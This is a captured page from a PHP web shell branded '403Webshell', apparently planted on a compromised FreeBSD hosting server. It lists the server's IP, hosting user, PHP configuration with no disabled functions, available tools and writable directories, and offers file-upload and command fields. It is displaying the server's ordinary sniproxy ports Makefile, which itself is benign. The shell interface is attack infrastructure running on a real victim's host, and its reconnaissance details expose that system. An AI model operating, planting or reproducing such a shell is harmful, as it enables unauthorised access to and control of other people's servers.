403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/net/sniproxy/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/net/sniproxy/Makefile
PORTNAME=	sniproxy
DISTVERSION=	0.6.0
PORTREVISION=	4
CATEGORIES=	net

MAINTAINER=	krion@FreeBSD.org
COMMENT=	Proxy that routes based on TLS server name extension
WWW=		https://github.com/dlundquist/sniproxy

LICENSE=	BSD2CLAUSE
LICENSE_FILE=	${WRKSRC}/COPYING

LIB_DEPENDS=	libev.so:devel/libev \
		libpcre.so:devel/pcre \
		libudns.so:dns/udns

USES=		autoreconf:build gettext pkgconfig

SUB_FILES=	pkg-message
USE_RC_SUBR=	sniproxy

USE_GITHUB=	yes
GH_ACCOUNT=	dlundquist

GNU_CONFIGURE=	yes
USE_LDCONFIG=	yes

PLIST_FILES=	man/man5/sniproxy.conf.5.gz \
		man/man8/sniproxy.8.gz \
		sbin/sniproxy \
		"@sample etc/sniproxy.conf.sample"

pre-configure:
	cd ${WRKSRC} && ${SH} autogen.sh

post-patch:
	@${REINPLACE_CMD} -e 's|/var/tmp/|/var/run/|' ${WRKSRC}/${PORTNAME}.conf

post-install::
	${INSTALL_DATA} ${WRKSRC}/sniproxy.conf ${STAGEDIR}${PREFIX}/etc/sniproxy.conf.sample

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit